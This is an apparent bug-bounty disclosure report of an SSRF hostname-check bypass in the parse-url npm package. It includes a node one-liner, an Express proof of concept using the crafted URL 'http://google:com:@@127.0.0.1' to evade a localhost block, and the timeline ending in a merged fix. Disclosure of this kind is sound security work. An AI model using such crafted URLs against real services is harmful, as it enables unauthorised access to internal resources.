SSRF via Improper Input Validation in ionicabizau/parse-url

Valid

Reported on

Jun 17th 2022

Description

Hostname is not detected because of improper handling of username and password. (Based on real cases)

Proof of Concept

❯ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("http://google:com:@@localhost"))'
{
  protocols: [ 'http' ],
  protocol: 'http',
  port: null,
  resource: 'google:com:@@localhost',
  user: '',
  pathname: '',
  hash: '',
  search: '',
  href: 'http://google:com:@@localhost',
  query: [Object: null prototype] {}
}

When receiving the above URL, the hostname is localhost, but it is not detected.

const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();

const isLocal = () => (req, res, next) => (req.connection.remoteAddress === '::ffff:127.0.0.1'|| req.connection.remoteAddress === '::1' ? true:false)
    ? next()
    : res.json({'state':'You\'re not locally'});

parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);

app.get('/', (req, res) => {
    if(parsed.resource == '127.0.0.1'){
        res.send('Not good');
    } else{
        http.get(parsed.href)
        res.send('Good');
    }
});

app.get('/ssrf_check', isLocal(), (req, res) =>{
    console.log('ssrf bypass');
    res.send(true);
});

app.listen(9999);

The above PoC code forbids the use of 127.0.0.1 host. However, by using the above vulnerability, it is possible to bypass this and perform an SSRF attack.

Impact

Bypass hostname check (SSRF)

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 2 months ago
Pocas modified the report
2 months ago
Pocas modified the report
2 months ago
Pocas
2 months ago

Researcher

❯ node -e "const parser = require('url-parse');console.log(parser('http://google:com:@@asdf'))"
{
  slashes: true,
  protocol: 'http:',
  hash: '',
  query: '',
  pathname: '/',
  auth: 'google:com%3A%40',
  host: 'asdf',
  port: '',
  hostname: 'asdf',
  password: 'com%3A%40',
  username: 'google',
  origin: 'http://asdf',
  href: 'http://google:com%3A%40@asdf/'
}
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back 2 months ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. 2 months ago
Ionică
2 months ago

Maintainer

Thank you for this finding!

Ionică Bizău (Johnny B.) validated this vulnerability 2 months ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 21c72a 2 months ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
to join this conversation